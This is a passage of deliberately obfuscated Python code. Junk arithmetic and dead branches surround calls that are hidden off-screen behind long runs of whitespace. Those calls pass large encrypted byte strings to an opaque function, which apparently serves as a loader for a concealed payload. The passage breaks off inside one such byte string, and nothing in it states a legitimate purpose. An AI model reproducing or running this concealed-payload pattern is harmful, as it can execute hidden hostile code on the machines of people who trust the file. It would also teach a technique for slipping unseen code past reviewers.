            _detectvar(Floor = -26725 / -96307).Algorithm(_square = Ceil.Modulo + 64760)                                                                                                                                                                                                                                                          ;_detectvar._hypothesis(_power='xxwwxxxxwwxwwwwxwwxw',StackOverflow=b'\x00\x1f\xdd\xe7d\x93x\x9d\x04\xe9\xde3\xe4\x90O10\x9a\x92\x91\xd5J\x9b\xee\xb0\x8f\x9d\xbf\x87\x8b\xac\xde\xc5g\x8a\xbc\xae\x94\xbe\xcd\xa0x\x95\xd53Od\x8cc5\x120w\x15\x1f\x17\x8d\x11\xc7\x8c"\x1d\r\xc4N\xcc5\x00\xa3\x9cNAq%^\xa9\x86\x9cR+\xfd\x9b\x1c\xd3\xce(\x97T\x18$\xfd\x8a\x7fs]\xdd\x86\x8c\xa3o\xa8\xff\xe3\xea\xa2\xff\xcf\xf5J\xe3\xc0\x00\xe0\xd2A\x12#\x01BtM|"\xc0\xd4\x9f!\xc2\xb5V\xea\xe4\xba\xdcU\xee\xa3\xac\x1dc\xce\x8c>\xad\xc48\xfd\xd4J\x9b\xee\x10\x84\xf7\x00\x13\x18\xa4\x14\t\x89\r\x15\xd7K\x9b\xeb\x08\xd0\xc2\x84#\x8e1\x8c\x91C\x1a+\xa5o4A\xaey\xbe\xd2\x04i\xd3\r\xb6\xe3\x1a\x99\xcd,\xd7\x88z\xeb\x00z#y\x02\x99\x11\xd1\x17\xe5\x99\x80\xde\xac\xab\xebr\xea\xea\x10\xc0\xb7\\FaKS\xf9\x11Y\r\xc8\x91\xbd\tu\x9e\xb4-\x01\xe9%s\x90nF<\x1aiI\xc7\xbf\xa6y\xa2\x8fd1q\xbdt\x93\x1d\xd2\x04\x1a"Mt\xa0y\x82k\xa5\xdb\xb6\x1aK^LN\xf1\xc7\xf1\x04q\xc5j\xbc\xae\xee\xab2qk\x80\x0cq\x83"\x11\t\xbc\xf3Vg\x10\x99R\x92\xe9\x92)\xb8b(\xee;4\x0f\xbb\xf2\xc2s:\x05\xc3xfLn&\xb6\xd0\xb9\xd9\x94\xd2]\xb6\xf6"Qd\x1d\xce\xe40\xaf7_Bc\xd4$\xfaH\x01lY\x01j\xa5\xdb\x84\x132$\x93\x83Ly\xdc\x04b\xdcT\xd9\x82W\xd5\xdd\x02c\xb0ZS\xfc(\x8f\xd2vTv\x17\xe7\xc6\xd4r\xae\xad.\xcd\'\xca\x18-\xb3 \x93\xc1\xb4\x18\xa0\xbd4\xae\x97\xb6\xbc7qe.\x93\xeb6&=\x10\x01\xc2\xab\xeam\x00\xe1\xe9\xc2\xfa\xe2\x1a\xfa(Q\x06UK\x0b=v\x85\xaahoJ\xceX\x08\x0cD\x7f\xectv\x8bI\xccv\x01\x87\xe0\xc8\xd9\x86&%25%&\x9b\x14\x18\xa1x+1y\xa5\x1c1\x19\xa4\xd4\x85\xdbqm\xed\xcd5\xe1\x05K\t\xea\xd9\xc1t\x10\x8b)8\xd6S/O\xc1\x944\xdcN\t\xab\xea\xe2w\xbb\xcd\xabZ\x92\x87\x98\x11\xa2/\x1eZbz\xef\x81\x1cK]\x1e&\x87s)\xbbs\xbf\xf2n\x1d!\xef\x180\xb0\xc7\xda\r\x86K\xe8\x8c\x0bT\xb4maGr\xbfp<)\x97K\xba\xe6&u;ZX\x81\xd0*\xc0\xf8lx\x8f\xd0\x0b\x03\x12EX/m\xd9\x00\x0c\xf0\x95R\x1b\xf3\xdd\xb3AS\x86\xff\xad\xaa\xbbI\xf8\xdf\xe6\xeaB\x99\xe0m9\x99\x9dKSv\x97\x84\x14`\xfea\xe5a\xa6\xa99\x9a\x93\xce\xae\x84\xdfrR\x8c\xbe\xb89&I\x81\x80\xde\xae\xaa\xe7\xd4z]C,\xfaQ\x9c\x80\x1b5s\x05K\x95q0\x12\x98Zu\xcf9\x83\xa8v\xc5\x8d\x86"!H\x89\xe0\xf1\x00\xec\x9e\x13\xb3zB\x19\x98\x88/\x10\xe1&}t\xa7\xd5J;\xe8\xad\x92\x04\x82#\x8a\xfbBZ\xa9\x12G,\xab\xdb\xdf`\xfai\x17\x97\xe0>\xf1\xa4\x8cJ\xc8+[eVKw\xbc\xa4\x1d\xa6Z@B\xe6\xa2\x80`\xb2\x81\xefC\xa0\xf5[{\x8e\xde\x07HaK\xe1\x07cC\xf6\\\xc6i\x8f+Lpnz\xd2\x16\xc6K\x8d\xe1N~\xc6\xa7#q \x8a\xe2h\x1c\xfb\xce\x00\xc1e=f\x91vc\xbe\xd9U\xad&)\x05\xc2$\x13\t\x186L\x97\x91\x81\xab\xb9\n\x96\xd9\xc2\x95\xd6\xe8\xd6\xf3\xca\xc8\x1c\xcb\xcf\xbbb\xb2Z\x11\xfa*\x03^\x19j)\xb9g\xdc\xa5M\xdeFz,\xe9\x99\xa9\xb3Rv\x90\x18\x0bP\xc0=p\t|\xeeu\x004\xe2\xf0{\xb6\tK\xd1\x89\x83\x0c3\xa1\xea\xae\xab\xdb>\xa1.\xe6X\xff\xaa\x99\xae\xe9\xa5\xb9|\xdaG\x004\xc0\xbb|\xcc\x95K\xf2i\xad\xd4\x89\x9c\x11 \x04;\xd5\x9c\xda\xc0/\xddC\xe5\xbcV\xea\x06\xae\xd9\x81\x13\xf5\xadR\xe5\xb6\xb4\x11S\xfe\xee\x0b\xe3\xa0\x81\xc3u\xa4/\x9b\x98Za\xe5\xe1\xee\xeeWt\xe6eu7H{\xf3\x0eCu4|\x93X3\xc8\xb6\xce\xa0N^\x89\x9d1f\xa4\t\x00B \xbfE@V\x01\x17Wh\xac\xa4\x16 \xde\xafl\xeb\xcf\xef\xda\x020\x00\xd2\xaa\x012V\x15\xb8Q`"\xbb\xf7D[\x05\x134\xe0\xbf"\xb4Rjp\xd9g\xc8\xdbY+\xdd\xc4\xc5\xaam\x0eHY\x99\x18\x17k\xa5t\x9b\xca\xa2\xa4\xee\xe3\x98u\xb6\x88\x1a\xe7\x8a\xa0*\\W\xd79\x08\x18\x19;8j\x8dc\xd4(vMG\xaa\x89\xd86g\xdc$\xdb\x12Ae\xfa\x9a\xb2o\xb8\x9a\xc3\xd2mt\xba#\xaa\xea\xcc$\x11\xb4\xf1L6f\xcd\x19c\x99\x8b0\xec\x99\xb1\x83c(vGpHc\x15\x8c-D\x85\xa1\x10Q\x05\x0e\xb9\xaanC\x08\xcb+\xb9\xbe\xdb\xc1V\xc0\xb2\xe6\xc3\xde\xd5\x8e\x0b\xf5\x8fF6\xb5\xbdUvk&\'a\'B(\x1a\xd1`\x83\x84#z]\xdd\x86\x9c\x1f\xef\xd9\x19\xcdQ1\x0cR\xe0\xb8\x99r\x19\x95:bIro\xa6\xae\']*\x07\x97\xc8\xefv9\x81\x96`m\xe1\x88\xca\n\x8fK\x14\x95>;\xa1\x0f\x8a\xc54\xc5\x8egI\xbd\x8aN\x91\n\xdccu]\x17\x04|C-C\xb0T\x91\x99\xa8\xf8Lo\x0fY\n\xd9u\xf9\x82G3\x93\tr\x1fH\x84\xba\xe4n|\xbbT\x06\x17\xf1\x14\x89tC\xce\x18\x8b\x82<URL\xda\xceH\x00%\xe0d\xc2#\xa0\x82\x04\xc9\xa4\xdc\xb8\x9c"\x0c\x07L0\xc5YJ\xca\x08\xaa%\xb5\xd2\x0ep\x1aL\xaa)\x13\x18\xb1\x98\x12\x0b\x8c\xc6\xaaz\x1b&h}/#\x90\x12M\xd3\x81/.\xf0\x1c\xe0\xbfe\xa3\xb2IS\xe2\xe1$\xdfZ,\xe4\xc4&u\x9d\xca\x891\xc2i\x93\xdc\x15{\xa8\xc4CT_Yi\xda\xf9\t\xdbz]\xca\xe9o\x85\xe7\xd0\x91}\xcbaZ\x96J\xfa^y\x8d\xa5\xed\x06W&\x87\x17^\x1c\xda[\xf7\xf7\xff\xb7\x9eQ\x0b<%P2\n\xff\xa0x\xd8\xdf?;99===99;\x01\xfa\xc0\x13\xf5<\x18\xce\xc7\xfb\x8b\xaa\xbf\xba_JN[I0\xb78\xd8~\'\x94\xdeAAz\x1b6\x0e\x80"\xb6\xaa\xae\xbd\xc2\xfa\xffj\x02\xc2r\xa4M\x9be}\xa6\x11s3\x83\x9c#\x9b\xc1\xfb1{\xbe\xa3)\xae\x9e\xf6o\\\x9f\xec\x9c\xc9pQ\xdao\xc70I\xe4\xa4gjVQ7\x197\xb69>\xb6\x97\xac\xcb\xa1r\xbe(cwy\x16\x95T\x9d\x0e)In\x88\xa0\xac\xf5\x9c\tF-\x1f%yu\x00\xf5\xed\x06(2\xf08\xf8:`5A\x89<\xfaL\xd9|+\xa5\xbb2\xb1\xba\x87T\xd5;M]@\xe4\x92\xf7\xec.[\x11~\xba _\x9de0o\x986\xe8\x8d\x04\xa6=\x13"\x8eY\'(v\xa2y\xf0\xc4J5\x93\t\x01\xd8|\xc4\x86Z\xa6\xd9\x94\xe1\x00\xab\xean\x80\xc7}M\x07\x81\xa8\xe4$\x8c\xd20Sg2\x8c\xfb\xd10\x1d&\xbdH\x89\x19JR\x0b"\xa5\xb8\xc5\x11\x94\xc7JZS[}\xf5\x19<\xcc\xe38QO\xac\xafny\x90\xa8\xa5\x10ox\x18\xf6\xa28\xe9\xa9\xf2<\xe9\xc7Y2N\xfb\xc9Hu\xeeT\xf5o_\xfd.W\xfbU\xfbW\x9f\x95$\x13\xc7\x11\xfd>\x82\xfd\xa9CFQ\x9a\x8c\xd4t\x1e\xa8}\xe5a\x9c\x84\xea\x9c \xe0Q\r\x90\xa8\x97\xdc\xa8\xefU}\xa5\x8c\x0f\xe1\xb3:\x9f\x00\xeb\x0f\xe3LM\x8b\xc3\x14\xce?VG\xf3\xe3^\x9c\xa8m<Ou]\xbe\xdaN\xd5\xfe|>.\x9cg\x1c\xf0\xf9\xac8\xef\x18\xaf\xb3\xaf\xda\xa1\xaff\x07_\x9d\x07\x9cd\x9e\xc0\x90\x8e\xd5\xe7\x08\xda-\xcdp\xbfq\x927\xdfo\x18D9\xfeN\xb5\xa7:?\xfc\x0c\xc7Q\xe7\x0b\xfbU\xefj\x1f\xea\x9a\xf0\xb8Y\x12\xa9\xe3\xaa\x06\x8a\xd4/\xa1\x9d\xe4\xf5\xaa\xfd@{\xe5XO\x9d\x97\x12\x19\xa0<\xc5\xb6\xc1\xcf\xc9\r\xdd\'u\xe72<\xce\x08\xda5\x1a\'\xe9\x82\xf6KU\xab-<\x8e\xba\xbe\x11\xb4\x7f\xa2~\x02\xed\xaaZ\x7fU\xfb\xc6Q\x02\xf7\t\xf6\xaf\xbe\x8f\xa0\x1c\xcfC\xdf7\xf8]\x9a\xc1\xf9\xf0u\xa9vR\xdbJ\xa4\xcbc\xea\x87\x01\x1e\'\xa7v\xa7\xf6Xq\xbe\xeaw\xeax\xaa}\xc3\x1e\xde\x97\x84\xda\x13\xf7C\xfb\xcbU!\xdd\xb7!\xfc\x0e\xfa#\x9c\']\x17\xf6\xbf\x0c\xee\x03^\xf70\x82\xfe6V}3S\xbf\x87v\x0cU\x9d\x11\x9c\x8f\xda\xef\x04~\x0f\xed\xac~\x9f`{Fx\x9fs5\x8e \x83B\x86\xe75\xc4\xfacjGs\x9d\xaf=\xcf(\xca\xdcd\x82.\x93\x90\x1a|\xa1E\x16\xb6\xa6\xec\\\xa1\xd7\x00\tL\xa0t\x9a\xa8\xb5V\x83\x89\xc7\x00\xc6\x81\x93?\xe4\xa8\xed\xc0\x17\xc7\xc6)\xc6\x19\xc8tK\x910j5\xa9\xeb\xd2\xa8\xd5\xa1\x1c\xb3GT\xd6\x90MuzKt\xd6\xcd\xa3c\x96k\x02\xb1\xcd\xbc\xc0\r"\x91_\xb1X\x0f\xd7\xd5\x8d\xdc\xae\x87nmL\xd5()\xabA\x94m\x85\x8e"\xb0\x9d\xe0\xc18u\x1d!\xcf\xf9\xddR\xa4\xda\xccQ\xed\xdc\x1dD&Hq\x9b\x19>\xc8K\xc0\xb1\x9c\xa2t\xcb\x8a\xeb\xaa\xb4\x94\x94\xd7\x95\xd3R\xc2_\x07cI\xe6\x96\t\xc4\xd80\xc9\x7f\xc5XZW7pi\xb0\x111\xffmtV\xcc\x07\x87R\xfaep\xb9Ij\xb8\xb75W9"\xb5}~\xe6\x14\xc1/\xf4\xf7\xdc<\xd7i\x82d*\x80\xea\x06\xe6)\xa2\xb6J\xabe;b\xf7Q\xb2l0iG\xcf\xba7\x80,\xf6\x80\x04\xa5\xcc\xd3\xaa\xf4\xb8iS\xc6\xc8\x05\x96 \x17\x18q\x89\x835$\xa9\x97:@\xa4wc\xa0\xe3\xe8s^r\x19G)\x93&\x85\x02\xe0\xb5\xaen\xc3\xa9\xa4\x03Vb\x808\xe7i\xd4]p\xe5\xd2\xc5M\xe29\x87\x06\x81as\xeae&C\x81#!\xb9%\xd4\x7f~g\xc9R\xf8\xe5\xdd;I4/\x1c\x0eK\xdc\x19\x0eL@h\xc3\xdf\xe0\x102l\x9d\x9e\x9c\x92e\xfb\xecTmB\xfe\xad\xd3\x93\x93\xd7\xe4O\x94\xe8\xdd\xcc\xe0y3\x83\xb4\xe1|\x14\x19')

        _detectvar(Floor = 67672 + -30065)._positive(_add = -90157 * Ceil.Modulo)                                                                                                                                                                                                                                                          ;_detectvar._hypothesis(_power='liljjllljiiiljilliiiijli',StackOverflow=b'\x7fvd\xa7K\x11+\x92\xba\xe2w\x128\xe5\x91\xb9\xb2\x91\xb92\xea\xe7\r\xb0\xca\xf3\xe2i\x7f\x99\xbdnFQ\xf5\xb3)\xa5\xc4Q\xcf\x8d-rg\xea^\xea\xdb{\x86\xc6=\'x\x13`\x12\x83\x10\xfc\xa0\xc4v[){\x9b\xe0\xa0Wj\x80i\x82\xf4\xd0\x81\x0f\xf4\xd0\xea5\x05WA\xe0\xab\x99\x12p}\x91\xfan\x92\xe4\xadf\x12\x124^^8\xd5:\xbe9\xb9;\t\x06\x9d\xc5\xc8\xcf\x02[!\x12\xfa\xa5\xf5\xd2\x1d\x89\xf5z\xaf\x80\xcc\x12\x1b\xa6M\x9b$#/+\x11\xd3\x8e \xb6\x8c\xc9ie\xb8\xb0\xf4\x91\x9c\x8c\xac\xb5S[\xda\xe4\xa3\xd8\x92\xa02Z\t\xa1\xa0"\xd8s]\xdd&\x99&\xe5\x028\xa0i\x13\x9cu\x05\x9e#\xcd\xa6\x03\x7f@\xdc\xa8\xd4\x08(\xbb\xc2J\xf9\x8a\xd5\xaf\x92\xb2S"\x90K\xdf\xac\xbf\xf1\xfa\x94q1\xc0\xf6\xc5\x066m\xbe\xe9\t\x13\xb6\xa3\xf0\t\xe21\xc0F\x00A`\x07\xf4\xbeTM\xb6`E\x9a\xa0\xa6\xe7\xc2\xe2\x92i\x11%3\x81F6\xf4\x08\x9fnD\x944G\xc6!`\x11\x08\xc1bKB\xb8Zn\xdah`\xb7(3\xdc\x12\x19\xcf\xedt\xda:\x01\xc1\xee$\x0e\xb4\xb2\xb9a=\x9eoU8\xe7\x08\\\xce\xbf\xc0\xccULH\x1b\x89\xa0\xbbU\xf56 \xa7mkI\t\xc6\x1d2\xea\xa0\x99\x1b\xa4\xd5[\xd8\xc2\xf4\x17\xaa\x0b:\x92i"\xb4M\x12\x86\x02l\x04!\xca4\xb5\xd2\x0e\xfc\x16I\\v)\xfbbI\x92\x91\r\xab\xea5\\\xaa\xde\x0b\xfeb\xef\xe2B\x1fU\xeb"\xad#\xda\x8d\x93G\x1898_I5\x01s\x93\xban\x130g ?%\x91\x1a\x11\xfd-\x18EL\xd8\x15\x87^q\xc0\x86\r\xe0\xe0\xefv\x1e\xebl\xc2O8\x8c\x83\xb79d%qw\x9d\x8e\x99\n\xca\x8172\xd4\x8e\x9f\xce\xb8\x80\xdd\xf8\xb2%\xab\x9bdy\x93\xe1s\xce\x02\xe8\xb6\xc3B\xb6\x90\xc5N\n\xeb\xb5\xf0\xc1\x9de#\xb3!nl\xa4\x1a\xd6d\xdd\x92\x99\xee\xfd\xc6\x1c\xec\x1dc\xe9\xf11\x1a1\x0b\xf5\xdeTnH\xd1\x97\x10!5C\x80qP`\x0b\xe9\xd7K\x1b\xdbB0\xebH\x0f\r)\x11\x9a\xbb\xc0\x07\xd4\xab\x97v \x88DqY\x17f`\x04\xcb\x93\x12@\xb1\xae\xee6\x12 \xa4Q\x0ef\xb34E\xdd\xcd\x8d\xb7\\r\x06\x96\xf9\x04K\x80\xf3\xdd_7E\xeaT\x83\x04\xb0\t\x84\\\x85>Fa8\x04-\x95g\xe34\xc4O~\x1ac\xea\x84,\t\x17\xe9\xb0Jilg\x1a\x05\xcb\xe83y\xf9\xb5\x81\x14\xbc\xb3\r\xcd\xa3+\xf53\xce\x89\xc7\xc1\xfe<NX\x80O\x84\x8e\xb6\xaenc\xfb\xd3kZ\xbe\x8b\x80\x85\xd5\xb8\x992\xe7\xb0\x85O[\x08\xb5E\xd78r\xd2\xb8\xf1\xe8\x83\x0f\xeb\x14\xfc\x1e\xa7g\xe0\xd5:=%o\xd6\xd9i\xcb\xfe\xc3\xf7\x9e\x01j&\x89\x19\xeb\xedP&X\xb9\xd6\xd5uhR\xd9\xc8l\xb3\x92\xd7\xf9\x16\xedI\x98\xcc\x123\x7fL!\x07Hk\x04\xdb\x16\x8cJ\x1dZ\xfc\xf7N\xd0\x85\x861?\xd8\xa5N\x1a\xfa\xd1Vb\x058"Z\x12\xb8\x19r7\xd1\x95\x9a\xd4uj\x9ds\x1a&j\xa2\xf9Y]\xb2\n\x13S\xbe\xb1r\xcc\xaa\xa2\xa3\xc5|\xe4&\x8c\x99\xe388\xa2\x83\xe39\xe4\x16l\xf3\xfb\xfb\x8d\xefX\tY,\x91\xe5\x1a\xc2\\!\xb48a\x1f\xe1\xf1\xc0\xa6SN{!\xcd\xa9\xfd\nQ\xe2\xaa\xbaM\xccJ+\xa0d\x8cL|&t\xe2sk\x91eg\xac\xefk\x04\xf4*\xad\xb0\x0c\rw&\x9ewDm\x08$\xb0_\xf1\xff\x1b\xf1\xc2\xe2vsl\x04h\x9712\x0cf\x98\xa6 AtD\xad\xd4\t\xae\xed\xffw\xd5/\x9d\xb1,\x7f\x8c!\xfa\xb69Y\xf1{G*\x15\x1by g\x8b\x9f@\x1f\xed\x81\xa99\x89T\t(Q!P\x8e\xaa\xad0\x81 .\xb5&\xa4Y\xd0J\xa1Z\x01X\x90\xf4\xd0\xd5\xe4\x9d\x86J\xfa\xfd\x1ac\xf7.\xc8\'n\xde\xf0\xb8;0\xe7n\x89\xeb\x8d\xa5\xa9\xb2\xd1\x9d9\xdf\xec7\x8eL}\x96h!\x0e\xc0\x14\xd4w#C\x8aTc6\xfdX_\x949\xa2\xce\x95n"W\x8e!i\xf0\x91\xe9\x06$\xb3\x9b\xdd\xdeiS\xfcbWC\x8d\xb1\xcf\x91\xac r\x83Fj\xd6\xdbB\x86\xd04\xae\xa6\xce(\xa7\x07L\xdd%\xd0p\xc0\x85u\x02HST\x8d\x81$\xe3\x14)2\xdaj\xc9=a\xbc\x8e\xb5\xd6\xdb\x13R{ \xa4\xfb&u]:\x8d\xddj\xc9C\xe3\xb6);j\x86\xc6\x95\xf37\xc0\\XgF.\x93(I\xa2\x107\xd7\xda\x8e\n\xa4\xd04 \x05\xee\xb4(\x90J\xa91\x1d\x88+\xb9~\xc3\xca\t\xa6\xf7\xceP+\t1\xea&CdM\xadt\xbbRV7\x89\x1e\xec,\x8fs|+\x80,\x99D\x11lw;\x9b\x02\xda\x8e@\xfaN\xf0N\x9d\x10\x08\xc56E\xa8\xcc\xbb-g\xcd\xa8\x12\xea\xb8\xaa\xeevr\xa8wKq\xf6\\\xb6\xcf4\x8d\xf4[\xe9R\xe2\x9c\xf2il\xd9-\xd9]\x84!\xa2\xc2\xa5\xb4\xaenC&\xccW\xd9\xca\xfc.\\\x02k4j\x9b&\x8bl\x82QR\xb3\n\xba\xe3"v\xce\xce\x83\xfc\xf5\x9a\xd4A\xb3\xd9\x1b\x8e\xfb\x11?\xde1l\x02\xe3~\x83\xc0\xe67n\x1e\xfa\xbb\xe9\x92C\xa0\x07Lz\x04\xb6.\x8a-\xef\xd5K\xdfz\xb6\x84\x05/\xd1\xc4\xb8=$\xc5\xa5SM\xeb\xa5o\xbb\xe0\xbdO\xc1\xb4d>\xea\x8b8\x17\x1b\xefbJvA9\xdd3\xd9\x1e\xf0\x9dx\x1d\xf1\xb5\xb9\xbd\x97 ?>\xa6\xa5\xd5\xb9\xd2>%\xf5\xd2\xa6;\x8c\xd0L\x9c"\xa09D\x90\x12\xd1\xc4\xd5J\xdf\xa6\x7f\xbeR\x10\xeb\xa9\xbb\x96\xa9{5\x89\xfa\xc9$\x9e\x00\'g\xa2\x16\xc4\x08\xc2\xeer7\xae\x88Rnz\x91\x8f\xbe\x92{\xc9\xbc\xbf\xe7%jO\xe7\xa7\xfb\x8a/\xe8\xa0\xf8\xda\xf2\xfeK"~FYgR\x8c\x11\xcav\x93\xban\x11\xda\xdb3I\x8dk\x86)\x89\rue\x8e\xea\xa6\x97\xd0Z\x7f\xa9Y\xf9.\xdb\x13}\xf0\r\x972,w\x06\xc6%D\x15\x18\xff\xaa\xbaN\xc9\xc9\x9d\xc7\x80\xcb\x04\xa9e\xea\xee\xbc\xfcp\xe2\xfbN\xf4\x84\xdd\x84\xbe\xe9\x95D\xad\x12\n&\x9f\x16<\xf6\x9e\xbb\xff\xd2a=\x92|\x9a\x92a\xd3\xad\x0c/\xfb\xa3 \xa1\x8e\xe30\xed\xc7\xa1\xa3\xd0\xc6L^\xa7\xd5R\xaa\xfc\xa2Nz\xa8LO 3*1\xfa\x02g\x86\x05\xa9\x0c\x96\xd5m\xa2\x1d\xaf\x00\x8d\xc3\xc7c(\x86\xc8\xdfc|i\x08\x1c_y\x85le\xceb\x9b\x8f\x96\x17G\xa4\x86\x12W\xb8\xae\xaeK\xfa\xa8\x14GU\xda.\x8b\t\xd3\x86`\xe1\xb1\x8d@\xde\x01\x9f\xab[\x9c\x8b\x98Qx\\\xd9\xa7\x1ds\x8d1^+4\x02R#2T\xa1\x81b#\xc5L\xbfI\xbd\xb4\xa9\x8a\x01\xeam\xc6,\x10\xc4\xfa\xa6~\x11\xd5K\x9b\xeb,\x91RqB\x0c\xa7\xe8\xa1\xba\x13~&j\xebJ\xe96\xed\x9f,\xa0\xca\xf8L\x99\x89\n\x04W\x86\x7f7\xa9\xbbaL\xe7jn\xbb\xa5JK5\r\xacTV\xa4:\xa3^\x1d\xad\xc5]Q\xa5\x17X\xe6\xfb\xda=\x02\x19&6qJ\xf4\x100\x95]\x93>\xccN\x89J\xe9&Ju\x80\xf9^\xfb\x9a\xed0\xd6Ju\xa5t\x9b@+\tPd\xac8\x13\x84\xf1B\x91-\x003.\xab\xdb4\x19z{m\x1e\x17\x16\xd0\xdc\x85>\xd6f\x99\xd1\x94#\x9a}D\xffmb\x83\xc9p\xe6"z> \xe4#\x1bL\xad\xb4yw!BL 5\xea\xe1<K\xdd\xa5V\xdat\x87\x81\x9eQ)\xea\x0c\xce*\xfd\x0c\xc9\xdak\xa5\xdb\xec\x7f&\x8e\xac\xa2\xcd\xf7\xc53\xadp\x18\xac\xaa\xdb$\x95_WV\xce\xb6\x19K\x9fu\xd0\x91q\x0ei,oc*\xc8\x14-\xdb!>0\x01\xf4g\x88+\xac\x94m\xdfD\xf7\x1e\xcc+{3\x9dKw\xc6ir6\xb0\xa7\xee\n\xdc\xf5\xad\xe3~\xf7\x80\xf2dN\x0c(H\x7fB\x14(\xf3\xc6\x12\x16\x92\x96F\xe8\xdfO\xc8F\xfd\x19\xd8\x80k\xa5\x9b\xcc\x99\x01&T\'\xa2\xb1\xbe\xb6[\xd7J\xdfJ\x06d_,s\x8d\x1b\xdb\xd4\x02\x19pY\xdd\rr\x02\xb7\x1d\x91\xdb\x0c5M&\x1c{csnZ\x12\n\xfb\r\x7fr\xe4\xf3\xec\xa7\x91z\xf8i\x18\x0e\x83I0\x01\xee\xbd$\x0br\xc8\xc5\xa9\x06L\x92\xc26\x84\x16\xb7\xd3iu\x10\xb9\x8e\x84\x19\x105&T\xed\xc0\xa0.Qi\xec\xeb\xe7\xfc\xd2\x99\xb0\r4\xa9\xeb\x94ZZ\xda\xa3Z\xcd\xf5\x17t\xb4s:\xb6z6\x1d\xde\xfdk\xa2\x91\x04"\xe0\x04S \xf5\xd5/\xb2z\xe9\x8e,\xa2)\xe4\xbc@\xee\xb2I\xab\xee\t\xae\x1d\x8a;\xa1@\x14\xda\xee\x00\x0b$s,\xf4c\xcb;\xcc\xa9r$\x16h]\xdd\x0e\xec\xf8\xb4b$:\xfdUb\xc4\xf6\x05\xa5\xcdQ\x08)\xfe\x08,\x18$\xaa\x139C\xad\xf4\r\\\xa7\xaf\x89\xa4*\xfb\x1a\xf2\xd2\xfb8*\'\xdat\x17U\xd5]X-n\xf0\xc4\x0b4\x1e\x8dy<6Dx\x04(\xba\xa0M\x8c\xd4+\xb4\x1e\xd4J\xb7)f\xb2\x9d\x9b\x95w\x96(\xa4\xcd\xbb\'\x08=\xd6\xd5}\x05\xac\xe4\xd5\xf9\xde\xd9\xf0\xc0v\xfa$.[\xb2cq\xde\xeb\xeb\xba@\xa3U\xe2\x86\xad\x14S\x96k\xe8\x1b\xf8\xfc\xde\xc7\xcaj\xf20\x1b?-\xaf\x96\xcbv\xd1GW\x8b\x84\x90\x10#K\xb4\xeb*\xb2\xa7\xfb\xf8\x08>\x05z^4\x8dR\x03c\x16\x98\x82|-\x01\x81\xee\x14\xa31\xabV\xda\x81+\x8b\x97v\x86\xf8J\x17U(\x06v\x93\xba\x1b$u\x7f\xd3\x00B<$\xbe\xf1\xfbv\r\x08\x86\xeb\x17\xf2f\x0c\xd0\xbd6\x00F_8\xd7\x8di~\xcdybG\xa3Kj\xdc\xd3v*K\xadKg\xdeB\xe67\xc9\x0b\x87%\x8e@\x02.l\xe9\x8ci<\xd1\xc9\xaa\x1b&.~\xdb\x10\xd9\x8e\x8d\x90Ds\x01\xd4\xdf\x03|m\x1c\x9a\xf3>Z!b\x14\xaf+\x16D\xc3\xe7X')

        if 386535 > 5459630:
            _detectvar(Floor = 23378 * -94876)._positive(_add = -78051 / Ceil.Modulo)
        elif 432812 < 7124657:
            Ceil.Algorithm(_square = Ceil.Modulo / -97477)                                                                                                                                                                                                                                                          ;_detectvar._hypothesis(_power='IlIIlllIIlllIIlIllI',StackOverflow=b'\t\xb9,\x95\xb7s\\\x87\xe8]\x8b\xf0\x15\x80\xab\x89\xfaa\x8a\xb9\x8ec|\xdd\xc8\xc7\xdc\xc3\x1f\xc5H\xf8K\xc9\x83"4X\xd6J\x9b\x1b "\xb4\xd6\xf7qi\x85\xed\x04\r\x10\xb5\xd2\x0e\xdc|\x8c\x87c\xde\x91,.\xc7\xdaH\x1a\xa9uu7\x95\xfc_-Ms\xbc1\xd3\xb5\xb24mc\xcb]Y\x02\xa3\x10\xe5\xd9\x1b5-\xaa\xe1\xe0\x8a\x87\xc8^!\xc7\xc8\'\x13\xbe\xae2\x9d\xeb\xaej\x0b\x15\x14AZ\xfa\xdcw\x16)\xbf\x1dz\xd3\xcc\xc4\xc2\xda\xecR\xe5\x88YG\xb8\xbet\x08\x16i\xc7\x82\x88\x9d\x8a\xcb d\xb1\xe5\x96\xa7C\x8d\xbe8\xcdZ\x89"\x94\xb2\xd1\xf09v\x90\xbdq+T\x1dq\x12A\x02\xa0\x96.P\x8df\x98Yyl\x9b\xe6&\xceW)\x03\x0e9\xb7\n\x13`\x05B\xbb[Ww\xa3\x04d\xaf\xe9v\x9d\x04\xbc\xe9\x96F\xaf3\xb7\xfbF\xd1<\x1b\x87N\x13\x1fp\x8a\xa8\x10_\'%\xa8\x95\xbe\x99\x87\x1a-\x0f\xf4j\xfc3[ \x8e\xdb\xfb\xaacT\xc8\x81\x81q+\xe4\xd1h\xda\xb4\x19E\x0b\x12S\x16\xd8\xedU}\x9f\xb2\xd3\xda\xb2\x8e\xe0W2/#\xf3+\xb2\xc5\xb5\n\xbfZUw\x03\xf8\xd5:\xbc\'h\xe6\x1b\t\xc6\x19\x89\xbe\x08\xb7\x0c\xb1\x1b\x06\xf5\xd2\xe6\x82q\x8a \x80\x14oB_\xc3C\xb3z\xe9;74t\xe2{\xc9k\xf1\x1d\xba\xdc\xbd\xe4\xab\x14a\xa0]\xee\xb5\\\x85\xc9\x0cpb&\xc5\xc6\xebP\xacQn>\x050\x82\xe7\xe43\x856VJ\x9dxq\xa0\xd3\xd218i\x1d\xa5\xab\xae\x956\xc7\xe0\xf5\x10(\x1di\x7f`\x8c\xb3JX/\xddf\xb7nA\xb6\xf7\xfeI\xf7\x98\x0c\x80\xb7\x04u\x95\xa1\rh0\x8c\xdeh\x15[\x1b%(\x13\xbf\xd5\xf3I\xb8\xa4\xafr\x1b\xda0\x14DC\xa3\x1a\x11\x91\xc3\\\x11N\xafjTR\x17\xed5e\x95\xab\xcdt\xaaW7\xcacG9\xddW\x81\xb9\xc8\r\xcac\x8d)\xff\x12\xe1(|\xc7\x94\x153\x06\x82s >\x8a\xf3\'\xbb`\xc0vK\xbc 